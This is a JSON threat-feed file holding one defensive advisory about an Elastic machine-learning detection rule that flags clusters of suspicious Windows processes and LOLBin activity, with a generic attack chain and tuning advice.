{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata. Fed continuously.","feed_url":"https://feed.craftedsignal.io/tags/ml/feed.json","home_page_url":"https://feed.craftedsignal.io/","items":[{"_cs_actors":[],"_cs_cpes":[],"_cs_cves":[],"_cs_exploited":false,"_cs_has_poc":false,"_cs_poc_references":[],"_cs_products":["Elastic Endpoint","Elastic Defend","Winlogbeat"],"_cs_severities":["low"],"_cs_tags":["defense-evasion","windows","ml","lolbins"],"_cs_type":"advisory","_cs_vendors":["Elastic"],"content_html":"\u003cp\u003eA machine learning job combination has identified a parent process with one or more suspicious Windows processes that exhibit unusually high malicious probability scores. The processes were predicted to be malicious by the ProblemChild supervised ML model and, when clustered, have an unusually high aggregate score according to an unsupervised ML model. This often indicates suspicious or malicious activity, possibly involving LOLbins, that may be resistant to detection using conventional search rules. The rule requires the Living off the Land (LotL) Attack Detection integration assets to be installed and Windows process events collected by Elastic Defend or Winlogbeat.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to a Windows system via an unknown method (e.g., phishing, exploiting a vulnerability).\u003c/li\u003e\n\u003cli\u003eThe attacker executes a legitimate Windows process (LOLBin) such as \u003ccode\u003epowershell.exe\u003c/code\u003e or \u003ccode\u003ecmd.exe\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe LOLBin is used to execute a malicious payload or script.\u003c/li\u003e\n\u003cli\u003eThe malicious script spawns additional processes with the same parent process name, creating a process cluster.\u003c/li\u003e\n\u003cli\u003eThe ProblemChild ML model identifies these spawned processes as having high malicious probability scores.\u003c/li\u003e\n\u003cli\u003eAn unsupervised ML model detects the aggregate score of the process cluster as unusually high.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages the spawned processes to perform malicious activities, such as data exfiltration or lateral movement.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation can lead to undetected malicious activity on a Windows endpoint. This may allow attackers to evade traditional signature-based detections and execute commands, download malware, or perform other malicious actions while blending in with legitimate system processes. The specific impact depends on the attacker\u0026rsquo;s objective but can include data theft, system compromise, or deployment of ransomware.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnsure the Living off the Land (LotL) Attack Detection integration assets are installed and configured correctly, as detailed in the rule\u0026rsquo;s setup instructions.\u003c/li\u003e\n\u003cli\u003eDeploy the detection logic from this brief by enabling the associated machine learning job combination (\u003ccode\u003eproblem_child_high_sum_by_parent_ea\u003c/code\u003e) within Elastic Security.\u003c/li\u003e\n\u003cli\u003eInvestigate alerts generated by this rule by following the investigation steps outlined in the rule\u0026rsquo;s documentation. Pay close attention to the parent process name and the command-line arguments of the suspicious processes.\u003c/li\u003e\n\u003cli\u003eTune the anomaly threshold (\u003ccode\u003eanomaly_threshold = 75\u003c/code\u003e) to reduce false positives in your specific environment. Consider whitelisting known safe tools by creating exceptions for their parent process names.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-05-15T18:08:23Z","date_published":"2026-05-15T18:08:23Z","id":"https://feed.craftedsignal.io/briefs/2026-05-problemchild-suspicious-process/","summary":"A machine learning job has identified a parent process spawning one or more suspicious Windows processes exhibiting unusually high malicious probability scores, indicating potential defense evasion tactics like masquerading and LOLBins usage.","title":"Suspicious Windows Process Cluster Detected from Parent Process","url":"https://feed.craftedsignal.io/briefs/2026-05-problemchild-suspicious-process/"}],"language":"en","title":"CraftedSignal Threat Feed — Ml","version":"https://jsonfeed.org/version/1.1"}